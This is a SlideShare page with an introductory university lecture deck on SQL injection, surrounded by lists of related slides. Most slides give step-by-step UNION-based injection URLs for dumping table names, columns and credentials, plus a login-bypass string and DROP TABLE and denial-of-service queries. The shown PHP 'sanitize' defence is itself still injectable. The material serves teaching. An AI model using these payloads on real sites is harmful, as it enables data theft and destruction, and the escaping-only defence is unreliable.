SlideShare a Scribd company logo

A Brief Introduction in SQL Injection

Download as PPT, PDF
Sina Manavi
Sina Manavi
Education
1 of 22
Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
• Introduction • Why SQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
We are all familiar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
 SQL Injection may happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
 Simple example:  Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
 www.yourtarget.com/list?id=5  if you want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
 The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name:  "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name:  "INFORMATION_SCHEMA.COLUMNS.“
 Finding the URL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number  Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued 
 Now its time to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'--  The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
 And Finally its time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts—  And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;) 
 Now we can Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
If user_list contains 1000 records then, the database is fired up  SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
Insert newuser into tbl_user The maliciouse code can be : DROP table tbl_user
 How it works Select * from tbl_users Where id=“Fname” and pass=“pass”  Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
 Security is the developer’s job  No database, connector, or framework can prevent SQL injection all the time
• Implement proper Error Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
<?php function sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
Vipin Samar, Oracle vice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
 Using Stroprocedures: CREATE PROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
 I don’t have to worry anymore  Escaping is the fixthe fix  More escaping is better  I can code an escaping function  Only user input is unsafe  Stored procs are the fixthe fix  SQL privileges are the fixthe fix  My app doesn’t need security  Frameworks are the fixthe fix  Parameters quote for you  Parameters are the fixthe fix  Parameters make queries slow  SQL proxies are the fixthe fix  NoSQL databases are the fixthe fix
NoSQL databases are immune to SQL injection.

Recommended

Sql injection
Sql injectionSql injection
Sql injectionZidh
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 

Recommended

Sql injection
Sql injectionSql injection
Sql injectionZidh
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionSayed Ahmad Naweed
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Sqlmap
SqlmapSqlmap
SqlmapRushikesh Kulkarni
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Sql injection
Sql injectionSql injection
Sql injectionSasha-Leigh Garret
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Sqlmap
SqlmapSqlmap
SqlmapInstitute of Information Security (IIS)
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...Edureka!
 
Sqlmap
SqlmapSqlmap
Sqlmapshamshad9
 
Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionVuz Dở Hơi
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 

More Related Content

What's hot

Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...Edureka!
 

What's hot (20)

Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Xss attack
Xss attackXss attack
Xss attack
 
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
 
Sqlmap
SqlmapSqlmap
Sqlmap
 

Viewers also liked

Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionVuz Dở Hơi
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionSatyajit Mukherjee
 
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!EC-Council
 
Java Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingJava Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingAnton Keks
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesiscorbanmiferreira
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)Guy Podjarny
 
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas Anna Morrison
 
9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toánLớp kế toán trưởng
 
Introduction to SEO Presentation
Introduction to SEO PresentationIntroduction to SEO Presentation
Introduction to SEO Presentation7thingsmedia
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern timesjeshin jose
 

Viewers also liked (19)

Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL Injection
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injection
 
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
 
HTTPS, Here and Now
HTTPS, Here and NowHTTPS, Here and Now
HTTPS, Here and Now
 
Java Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingJava Course 13: JDBC & Logging
Java Course 13: JDBC & Logging
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesis
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
 
Jdbc ppt
Jdbc pptJdbc ppt
Jdbc ppt
 
Mime
MimeMime
Mime
 
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
 
Bài tập kế toán tài chính doanh nghiệp có đáp án
Bài tập kế toán tài chính doanh nghiệp có đáp ánBài tập kế toán tài chính doanh nghiệp có đáp án
Bài tập kế toán tài chính doanh nghiệp có đáp án
 
9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán
 
Introduction to SEO Presentation
Introduction to SEO PresentationIntroduction to SEO Presentation
Introduction to SEO Presentation
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Jdbc Ppt
Jdbc PptJdbc Ppt
Jdbc Ppt
 

Similar to A Brief Introduction in SQL Injection

Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sqlKaustav Sengupta
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptLokeshK66
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
Locking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxLocking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxDave Stokes
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampFelipe Prado
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 

Similar to A Brief Introduction in SQL Injection (20)

SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Greensql2007
Greensql2007Greensql2007
Greensql2007
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sql
 
Sql injection
Sql injectionSql injection
Sql injection
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
Sql security
Sql securitySql security
Sql security
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
Locking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxLocking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptx
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Sq li
Sq liSq li
Sq li
 
Web application security
Web application securityWeb application security
Web application security
 
Code injection
Code injectionCode injection
Code injection
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 

More from Sina Manavi

Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Sina Manavi
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsEC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsSina Manavi
 
Password Attack
Password Attack Password Attack
Password Attack Sina Manavi
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting Sina Manavi
 
Password Cracking
Password Cracking Password Cracking
Password Cracking Sina Manavi
 
An Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecurityAn Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecuritySina Manavi
 
Aes (advance encryption standard)
Aes (advance encryption standard) Aes (advance encryption standard)
Aes (advance encryption standard) Sina Manavi
 
Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Sina Manavi
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynetSina Manavi
 
Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Sina Manavi
 

More from Sina Manavi (10)

Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsEC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media Forensics
 
Password Attack
Password Attack Password Attack
Password Attack
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting
 
Password Cracking
Password Cracking Password Cracking
Password Cracking
 
An Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecurityAn Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile Security
 
Aes (advance encryption standard)
Aes (advance encryption standard) Aes (advance encryption standard)
Aes (advance encryption standard)
 
Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynet
 
Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi
 

Recently uploaded

USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...Postal Advocate Inc.
 
Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationRosabel UA
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatYousafMalik24
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxCarlos105
 
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYKayeClaireEstoconing
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPCeline George
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfInclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfTechSoup
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfJemuel Francisco
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptxmary850239
 
Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)cama23
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSJoshuaGantuangco2
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONHumphrey A Beña
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptxmary850239
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Celine George
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfVanessa Camilleri
 

Recently uploaded (20)

USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
 
Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translation
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice great
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
 
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERP
 
Raw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptxRaw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptx
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfInclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx
 
Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)
 
YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptx
